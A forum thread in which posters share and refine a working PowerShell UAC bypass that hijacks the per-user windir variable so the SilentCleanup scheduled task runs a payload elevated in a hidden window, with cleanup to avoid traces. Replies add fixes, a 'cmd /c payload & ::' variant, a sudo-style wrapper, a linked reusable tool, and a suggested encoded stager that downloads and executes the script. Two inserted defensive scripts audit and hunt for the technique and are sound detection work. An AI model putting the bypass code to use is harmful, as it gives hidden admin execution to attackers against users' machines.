lokiuox Posted February 24, 2019

Hi everyone! First of all, sorry if my English is not that good, it's not my main language. I just signed up to the forum to post this, after watching the video Darren made about a payload that changes the Desktop background. I had this idea after he mentioned that the Lockscreen background could not be changed due to the fact that there isn't a "stable" method and it needed admin privileges. So I made a script which, when opened as standard user, respawns itself in a hidden window with full admin privileges and executes whatever payload you put in it. Here it is:

    if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) {
        #Payload goes here
        #It'll run as Administrator
    } else {
        $registryPath = "HKCU:\Environment"
        $Name = "windir"
        $Value = "powershell -ep bypass -w h $PSCommandPath;#"
        Set-ItemProperty -Path $registryPath -Name $Name -Value $Value
        #Depending on the performance of the machine, some sleep time may be required before or after schtasks
        schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null
        Remove-ItemProperty -Path $registryPath -Name $Name
    }

Explanation: There's a task in Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges. When it runs, it executes the file %windir%\system32\cleanmgr.exe. Since it runs as Users, and we can control the user's environment variables, we can change %windir% (normally pointing to C:\Windows) to point to whatever we want, and it'll run as admin.

The first line

    if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544"))

basically checks if we are admin, so that the script can detect whether it has been called by the user or by the task, and do stuff accordingly. Everything that needs admin privs goes in this block of the if statement, while in the "else" block goes what can be run as standard user, including the bypass itself.

The "Set-ItemProperty" line creates a new Registry Key "HKCU:\Environment\windir" in order to change the %windir% variable value to the command we want to be run as admin, in this case

    powershell -ep bypass -w h $PSCommandPath;#

"$PSCommandPath" evaluates to our script path, "-ep bypass" is equal to "-ExecutionPolicy bypass" and "-w h" to "-WindowStyle hidden". The ";#" part is needed to comment out the rest of the path of the task from the command. So, in the end, the task's execution path evaluates to:

    powershell -ExecutionPolicy bypass -WindowStyle hidden <path of the script> ;#\System32\cleanmgr.exe

The "schtasks" command will simply ask Windows to run the task with the now modified %windir% and "Remove-ItemProperty" will just delete the reg key after the task has been executed in order to not break other things and/or leave traces of the "attack". When the task runs, it will call the script with full fledged admin privs, so now the first block of the if statement is executed and our payload can do whatever we want.

Note: In order to work, the code must be saved in a script file somewhere, it cannot be run directly from powershell or from the run dialog. However, if our payload is small enough to fit entirely in the %windir% variable, we can reduce the whole script to just the three fundamental lines, i.e. "Set-ItemProperty", "schtasks" and "Remove-ItemProperty". (Idk if it can fit in the run dialog though)

Note2: I think it could break if the script is in a path that contains spaces, but I think it's easily fixable by escaping the $PSCommandPath in the $Value variable.
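The post above rests on two facts about the host: a per-user `windir` value under HKCU\Environment is honoured when the SilentCleanup task expands its action path, and that task runs at the highest privilege level. The following audit script is an added example for checking those two conditions from the defender's side; it is not code from the thread or from any of the posters. It assumes Windows 8.1/10 with the built-in ScheduledTasks module, and that the `windir` value normally exists only machine-wide under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment. The `-Remediate` switch, the function name and the output field names are my own.

```powershell
# Added example (not from the thread): audit the preconditions of the
# HKCU\Environment\windir + SilentCleanup technique on the local host.
# Assumes the ScheduledTasks module (Windows 8.1/10) is available.

function Test-WindirOverride {
    [CmdletBinding()]
    param(
        # When set, delete a per-user 'windir' value if one is found.
        [switch]$Remediate
    )

    $result = [ordered]@{}

    # Machine-wide value: this is where %windir% is supposed to come from.
    $machineEnv = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment'
    $result.MachineWindir = (Get-ItemProperty -Path $machineEnv -Name windir).windir

    # Per-user value: writable by a standard user, and expanded by the task.
    # It should not exist at all on a healthy host.
    $userEnv  = Get-ItemProperty -Path 'HKCU:\Environment' -ErrorAction SilentlyContinue
    $override = $null
    if ($userEnv -and ($userEnv.PSObject.Properties.Name -contains 'windir')) {
        $override = $userEnv.windir
    }
    $result.UserWindir = $override

    # Value the current session already sees (helps spot a stale override).
    $result.EffectiveWindir = $env:windir

    if ($override) {
        Write-Warning "HKCU\Environment\windir is set to '$override' (expected: not present)"
        if ($Remediate) {
            Remove-ItemProperty -Path 'HKCU:\Environment' -Name windir
            $result.Remediated = $true
        }
    }

    # What the task would launch, and whether it launches elevated.
    $task = Get-ScheduledTask -TaskPath '\Microsoft\Windows\DiskCleanup\' `
                              -TaskName 'SilentCleanup' -ErrorAction SilentlyContinue
    if ($task) {
        $result.TaskState    = $task.State
        $result.TaskRunLevel = $task.Principal.RunLevel   # 'Highest' means elevated
        $result.TaskActions  = @($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" })
        if ($task.Actions.Execute -match '%windir%') {
            Write-Warning 'SilentCleanup action path depends on %windir%, which a per-user value can redirect'
        }
    } else {
        $result.TaskState = 'not found'
    }

    [pscustomobject]$result
}

# Usage: run in the user context being audited; add -Remediate to remove an override.
Test-WindirOverride | Format-List
```

Run it as the standard (non-elevated) user whose profile you are checking: HKCU is per user, so an override left behind in another profile will not show up from an admin session unless that hive is loaded. The task check reports the action path and `RunLevel` without modifying the task.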
Shadowharvy Posted March 14, 2019

I am going to steal this and play with it. It gives me some horribly wonderful ideas. Would it be able to launch another powershell script? I am new to learning powershell myself.
Adriano Posted March 14, 2019

The idea is nice but the problem with this implementation is that by default, powershell scripts are not allowed to run. One would have to circumvent it, which is not difficult to do, or even better, get to the same result using another approach (vbscript or even a bat?). I think it worked with Darren because his powershell already has Execution Policies level set to either Unrestricted or Bypass, but he did it using an administrative account the first time. I will try to work on this and bypass this "security" mechanism. Here is what happens if you run it on a machine that has the default setting:

    .\Downloads\uac-bypass.ps1 : File C:\Users\user\Downloads\uac-bypass.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
    At line:1 char:1
    + .\Downloads\uac-bypass.ps1
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~
        + CategoryInfo          : SecurityError: (:) [], PSSecurityException
        + FullyQualifiedErrorId : UnauthorizedAccess
Shadowharvy Posted March 14, 2019

When you load it, it will be like

    powershell -windowstyle hidden -ExecutionPolicy Bypass C:\Users\user\Downloads\uac-bypass.ps1

I can post the short hand when I get home in 9 hours. But I'm at work and don't have my spare bb with me.
Adriano Posted March 14, 2019

I did make it work that way. Actually I ran:

    powershell -ep bypass

which gave me a new shell ready to run the script. But when I ran it I realized: SilentCleanup task runs as "Users" and not administrator. I realized the script goes into a loop, because the user is never a member of group "S-1-5-32-544" so it recursively calls itself. I changed the value of windir to "powershell -ep bypass -Command mkdir c:\windows\uac-bypass;pause;#" so I could pause and see what was going on. It said:

    mkdir : Access to the path 'uac-bypass' is denied.
    At line:1 char:1
    + mkdir c:\windows\uac-bypass;pause;#\system32\cleanmgr.exe /autoclean /d C:
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~
        + CategoryInfo          : PermissionDenied: (C:\windows\uac-bypass:String) [New-Item], UnauthorizedAccessException
        + FullyQualifiedErrorId : CreateDirectoryUnauthorizedAccessError,Microsoft.PowerShell.Commands.NewItemCommand

That seems to have correctly run what I wanted, mkdir and a pause, the rest was ignored, but still it seems it doesn't have permissions. Am I missing something here?
PoSHMagiC0de Posted March 14, 2019

Yeah, I've seen enigma post something about this. Surprised it hasn't made it into Empire yet. I am refactoring this thing and making it into a reusable script. It will take an encoded command or a file path. It might be done before I go out of town this weekend. We will see.
lokiuox (Author) Posted March 14, 2019

6 hours ago, Adriano said: I did make it work that way. Actually I ran: powershell -ep bypass which gave me a new shell ready to run the script. But when I ran it I realized: SilentCleanup task runs as "Users" and not administrator. I realized the script goes into a loop, because the user is never a member of group "S-1-5-32-544" so it recursively calls itself. I changed the value of windir to "powershell -ep bypass -Command mkdir c:\windows\uac-bypass;pause;#" so I could pause and see what was going on. It said: That seems to have correctly run what I wanted, mkdir and a pause, the rest was ignored, but still it seems it doesn't have permissions. Am I missing something here?

The task should run with elevated privileges by default, I tested your command on my machine and it works. Maybe it requires a user which is part of the Administrators group? I'll test it with a limited user and let you know.

3 hours ago, PoSHMagiC0de said: Yeah, I've seen enigma post something about this. Surprised it hasn't made it into Empire yet. I am refactoring this thing and making it into a reusable script. It will take an encoded command or a file path. It might be done before I go out of town this weekend. We will see.

It would be great 🙂 Obviously what I posted isn't refined, it's just a POC, I figured people will adapt it to their needs since it can be used in a variety of ways.
lokiuox (Author) Posted March 14, 2019

6 hours ago, Adriano said: I did make it work that way. Actually I ran: powershell -ep bypass which gave me a new shell ready to run the script. But when I ran it I realized:

Oh btw, you can just run this, you don't have to open a new shell entirely. This works even in the Run dialog (obviously you have to adjust the path to the script):

    powershell -ep bypass .\script.ps1

(Sorry for the double comment, I haven't figured out how to edit comments yet. lol)
SilicaAndPina Posted March 14, 2019

Doesn't work on Windows 7.

    schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null

returns "Cannot find the file specified". hm
zombo611 Posted March 14, 2019

Just a thought about running on systems that block .ps1 files. In some cases you can open powershell_ise.exe, paste the script and hit F5 to run.
brianzimm Posted March 14, 2019

    ## Use powershell -ep bypass .\script.ps1 to launch ##
    ## Fixed an issue where if there are spaces in the script path. ##
    ## Added option for interactive window, comment out the code to change back to hidden ##
    ## Current example below opens an Admin powershell window ##
    if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) {
        #Payload goes here
        #It'll run as Administrator
        powershell.exe
    } else {
        $registryPath = "HKCU:\Environment"
        $Name = "windir"
        #Use for hidden window
        #$Value = "powershell -ExecutionPolicy bypass -windowstyle hidden -Command `"& `'$PSCommandPath`'`";#"
        #Use for interactive window
        $Value = "powershell -ExecutionPolicy bypass -Command `"& `'$PSCommandPath`'`";#"
        Set-ItemProperty -Path $registryPath -Name $Name -Value $Value
        #Depending on the performance of the machine, some sleep time may be required before or after schtasks
        schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null
        Remove-ItemProperty -Path $registryPath -Name $Name
    }

Fixed an issue with spaces in the script path.
SilicaAndPina Posted March 14, 2019

Also worth noting: this doesn't work unless your account is already an admin. If you're, say, a standard user and the administrator has a password, this won't work.. but it will bypass UAC if your current user IS an administrator account.
lordnikkon Posted March 14, 2019

1 hour ago, SilicaAndPina said: Also worth noting: this doesn't work unless your account is already an admin. If you're, say, a standard user and the administrator has a password, this won't work.. but it will bypass UAC if your current user IS an administrator account.

You may be right. I think the script is just for educational purposes.
Pinnacle Network Posted March 14, 2019

Why can't you just Set-ExecutionPolicy Bypass?
PoSHMagiC0de Posted March 14, 2019

Here you go, new version. @Darren Kitchen @lokiuox

https://github.com/PoSHMagiC0de/Invoke-TaskCleanerBypass

It uses dynamic parameters and can take in the standard posh base64 encoded commands or a file location of your script. As far as the bypass thing, just run it as an encoded command. Better yet, here is a good way to launch it. 😛 Just create an encoded stager to downloadstring the bypass script from a web server and execute it with "Invoke-Expression", IEX for short, with the command. You probably can take this function, add after it the command to run it with your parameters and encode the whole thing to run. No bypass to execution policy needed.

Anyway, look at the script. Some modifications were needed to the reg hack. I needed to use cmd /c in front so I could escape the appended stuff that gets added when run, like the cleaner command. That was breaking the exploit. So the new reg entry is

    cmd /c yourpayload & ::

That runs the command and then rems out whatever else is there. SQL injection for registries. 😛

Since I won the competition this month, I am not payloading this. Someone else can run with this and create a BB payload. I know a few ways to use it but someone else can have a turn.

FYI: It checks if you have Win10, member of local admins and already UAC bypassed. Will run if bypassed, will do nothing if not on 10 or greater and/or not a local admin.
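Across the thread, two artifacts of this technique stand out for detection regardless of which comment marker is used: a `windir` value gets written under the current user's Environment key, and the launched shell keeps the task's trailing `\system32\cleanmgr.exe /autoclean /d C:` arguments after the `;#` (original post) or `& ::` (post above) marker, as Adriano's pasted error output shows. The hunt function below is an added example from the defender's side; it is not code from the thread or from the Invoke-TaskCleanerBypass project. It assumes Sysmon is installed with registry value-set events (Event ID 13) enabled and/or that Security event 4688 is configured to include command lines; without those, the queries simply return nothing. The function and helper names are my own.

```powershell
# Added example (not from the thread): hunt local event logs for the two
# artifacts of the HKCU\Environment\windir + SilentCleanup technique.
# Assumes Sysmon (Event ID 13, registry value set) and/or Security 4688 with
# "Include command line in process creation events" enabled.

function Get-EventDataField {
    # Pull a named <Data> field out of an event's XML, so we do not depend on
    # positional Properties[] indexes that differ between event versions.
    param(
        [System.Diagnostics.Eventing.Reader.EventRecord]$Event,
        [string]$Name
    )
    $xml = [xml]$Event.ToXml()
    ($xml.Event.EventData.Data | Where-Object { $_.Name -eq $Name }).'#text'
}

function Find-SilentCleanupAbuse {
    [CmdletBinding()]
    param([int]$Hours = 24)

    $since = (Get-Date).AddHours(-$Hours)

    # Artifact 1: Sysmon ID 13 records HKCU writes under HKU\<SID>\...; the
    # technique writes HKU\<SID>\Environment\windir, which should never happen.
    $sysmon = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 13; StartTime = $since }
    Get-WinEvent -FilterHashtable $sysmon -ErrorAction SilentlyContinue | ForEach-Object {
        $target = Get-EventDataField -Event $_ -Name 'TargetObject'
        if ($target -match '\\Environment\\windir$') {
            [pscustomobject]@{
                Time      = $_.TimeCreated
                Indicator = 'per-user windir value written'
                Image     = Get-EventDataField -Event $_ -Name 'Image'
                Detail    = "$target = $(Get-EventDataField -Event $_ -Name 'Details')"
            }
        }
    }

    # Artifact 2: Security 4688 with command line. A process that is not
    # cleanmgr.exe but whose command line still carries cleanmgr's arguments
    # after a comment marker is the expanded, hijacked task action.
    $sec = @{ LogName = 'Security'; Id = 4688; StartTime = $since }
    Get-WinEvent -FilterHashtable $sec -ErrorAction SilentlyContinue | ForEach-Object {
        $cmd = Get-EventDataField -Event $_ -Name 'CommandLine'
        $img = Get-EventDataField -Event $_ -Name 'NewProcessName'
        if ($cmd -and ($cmd -match '(;#|&\s*::).*cleanmgr\.exe') -and ($img -notmatch 'cleanmgr\.exe$')) {
            [pscustomobject]@{
                Time      = $_.TimeCreated
                Indicator = 'cleanmgr arguments appended to another program'
                Image     = $img
                Detail    = $cmd
            }
        }
    }
}

# Usage: run elevated (the Security log needs it); widen the window as required.
Find-SilentCleanupAbuse -Hours 48 | Format-Table -AutoSize -Wrap
```

Reading the Security log requires an elevated session, while the Sysmon channel is readable according to its own ACL. The second match deliberately excludes a genuine cleanmgr.exe launch, since the scheduled task legitimately runs that binary with the same arguments; only a different image carrying those arguments is suspicious.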
Dr.Chi Posted March 14, 2019

So just to clarify, all this is doing is just bypassing the UAC popup right? It's not priv esc since you have to be Admin to run it in the first place.
PoSHMagiC0de Posted March 14, 2019

I have seen UAC bypasses put into the privesc category but as far as a privesc from an unprivileged user like a normal user to admin, it is not. It is sort of a privesc since until you bypass UAC you really do not have any admin functions.

Update, per request from a Youtube user, I added in the ability for this to run on Windows 8.1. Does it work on 8.1? Have no idea but he says it does. 😛
Adriano Posted March 15, 2019

3 hours ago, PoSHMagiC0de said: I have seen UAC bypasses put into the privesc category but as far as a privesc from an unprivileged user like a normal user to admin, it is not. It is sort of a privesc since until you bypass UAC you really do not have any admin functions. Update, per request from a Youtube user, I added in the ability for this to run on Windows 8.1. Does it work on 8.1? Have no idea but he says it does. 😛

I can't say there are two types of privesc. It's just misleading to say so. As for does it work on 8.1, yes... the original one works on 8.1, that's the one I tested.
Adriano Posted March 15, 2019

5 hours ago, Dr.Chi said: So just to clarify, all this is doing is just bypassing the UAC popup right? It's not priv esc since you have to be Admin to run it in the first place.

yeah, such a bummer.
Shadowharvy Posted March 15, 2019

It's still a lot more discreet than letting the pop-up load then typing alt+y or alt+j.
Yves Rosius Posted March 15, 2019

    function sudo {
        $command = "powershell -noexit " + $args + ";#"
        Set-ItemProperty -Path "HKCU:\Environment" -Name "windir" -Value $command
        schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
        Remove-ItemProperty -Path "HKCU:\Environment" -Name "windir"
    }

Quick function that works like sudo 🙂